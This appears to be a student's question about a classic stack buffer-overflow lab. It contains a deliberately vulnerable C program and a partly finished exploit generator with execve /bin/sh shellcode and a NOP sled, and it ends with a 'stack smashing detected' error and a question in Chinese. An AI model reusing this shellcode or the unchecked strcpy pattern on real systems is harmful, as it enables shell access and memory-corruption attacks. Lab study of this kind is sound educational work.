/* stack.c / / This program has a buffer overflow vulnerability. / / Our task is to exploit this vulnerability */ #include <stdlib.h> #include <stdio.h> #include <string.h>

int bof(char *str) { char buffer[12];

/* The following statement has a buffer overflow problem */ strcpy(buffer, str);

return 1; }

int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"); return 1; }

stack.c

/* exploit.c / / A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h>

char shellcode[]=

"\x31\xc0" //xorl %eax,%eax "\x50" //pushl %eax "\x68""//sh" //pushl $0x68732f2f "\x68""/bin" //pushl $0x6e69622f "\x89\xe3" //movl %esp,%ebx "\x50" //pushl %eax "\x53" //pushl %ebx "\x89\xe1" //movl %esp,%ecx "\x99" //cdq "\xb0\x0b" //movb $0x0b,%al "\xcd\x80" //int $0x80 ;

void main(int argc, char **argv) { char buffer[517]; FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */ strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); strcpy(buffer+100,shellcode);

/* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }

0xffffd070+64=ffffd0d4

\xd4\xd0\xff\xff

* stack smashing detected *: ./stack terminated 已放弃。出这个是那错了